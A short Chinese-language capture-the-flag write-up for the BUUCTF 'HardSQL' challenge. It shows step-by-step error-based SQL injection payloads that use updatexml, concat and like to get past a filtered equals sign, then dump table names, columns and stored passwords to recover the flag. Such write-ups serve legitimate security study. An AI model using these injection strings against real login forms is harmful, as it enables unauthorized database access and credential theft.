buuctf-[极客大挑战 2019]HardSQL

很久没做sql了。。

打开这题,还想拿sqlmap跑,但是没跑出来,要手注了buuctf-[极客大挑战 2019]HardSQL_第1张图片

先用万能密码登了一下buuctf-[极客大挑战 2019]HardSQL_第2张图片

回显,是有爆东西的

buuctf-[极客大挑战 2019]HardSQL_第3张图片

然后就想到先用bp fuzz字典跑一下

就看到等号被过滤了,要用like来过滤

buuctf-[极客大挑战 2019]HardSQL_第4张图片

然后就去搜了很多用like过滤的,但是没啥思路

看了wp

1'or(updatexml(0,concat(0x5e,database()),0))#

使用报错注入,就是括号很容易少打。。

可以看到爆出了用户名

buuctf-[极客大挑战 2019]HardSQL_第5张图片

爆表了,H4rDsq1,因为这里等号被过滤了,所以要用like

1'or(updatexml(0,concat(0x5e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like('geek'))),0))#

 buuctf-[极客大挑战 2019]HardSQL_第6张图片

爆字段

1'or(updatexml(0,concat(0x5e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('H4rDsq1'))),0))#

buuctf-[极客大挑战 2019]HardSQL_第7张图片

爆值

1'or(updatexml(0,concat(0x5e,(select(group_concat(password))from(H4rDsq1))),0))#

buuctf-[极客大挑战 2019]HardSQL_第8张图片 

但是发现只能看到一半,需要使用right函数

1'or(updatexml(0,concat(0x5e,right((select(group_concat(password))from(H4rDsq1)),31)),0))#

buuctf-[极客大挑战 2019]HardSQL_第9张图片

flag拼了半天我丢

你可能感兴趣的:(数据库,mysql)